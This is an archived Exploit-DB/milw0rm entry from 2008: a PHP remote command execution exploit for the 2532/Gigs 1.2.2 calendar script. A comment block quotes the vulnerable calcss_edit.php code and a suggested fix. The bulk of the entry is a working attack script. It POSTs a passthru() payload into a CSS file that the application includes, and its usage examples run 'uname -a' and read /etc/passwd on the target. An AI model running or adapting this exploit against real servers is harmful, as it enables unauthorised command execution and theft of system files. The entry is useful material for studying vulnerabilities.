2532/Gigs 1.2.2 Stable - Remote Command Execution

EDB-ID:

7512

CVE:

N/A


Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2008-12-18


<?php


/* ----------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit
 * ----------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it 
 * works regardless php.ini settings
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ----------------------------------------------------------------
 * Code Details (calcss_edit.php)
 *  
 * 1. <?php
 * 2. ...
 * 12. sleep(2);
 * 13. $id = $_POST["id"];
 * 14. $content = $_POST["content"];
 * 15. //lets write the updated CSS file
 * 16. $filename = "css/calendar.css";
 * 17. $theText = stripslashes($content);
 * 18. $data = fopen($filename, "w");
 * 19. fwrite($data,$content);
 * 20. fclose($data);
 * 21. // display the new css file
 * 22. include("css/calendar.css");
 * 23 ?>
 * ----------------------------------------------------------------
 * Fix
 * 
 * <?php
 * 
 * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF']))
 * {
 *      die("Access Not Allowed");
 * }
 * 
 * ...
 * ?>
 * 
 */



error_reporting(0);

$host = explode('/',$argv[1]);
$exec = $argv[2] or usage();


$sock = fsockopen($host[0],80);

$post = "content=<?php passthru('{$exec}');?>";
$leng = strlen($post);

$data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1\r\n".
        "Host: {$host[0]}\r\n".
        "User-Agent: Lynx (textmode)\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Accept-Encoding: text/plain\r\n".
        "Content-Length: {$leng}\r\n\r\n{$post}\r\n\r\n";

fputs($sock,$data);

while(!feof($sock)) {
$html .= fgets($sock);
} fclose($sock);

echo $html; 



function usage() {


print_r('
-------------------------------------------------------
2532|Gigs 1.2.2 Stable Remote Command Execution Exploit
-------------------------------------------------------
by athos - staker[at]hotmail[dot]it
works regardless php.ini settings

Usage: php xpl.php [host/path] [command]
       php xpl.php localhost/cms cat ../../../etc/passwd
       php xpl.php localhost/cms "uname -a"
       
'); exit(0);



}


?>

# milw0rm.com [2008-12-18]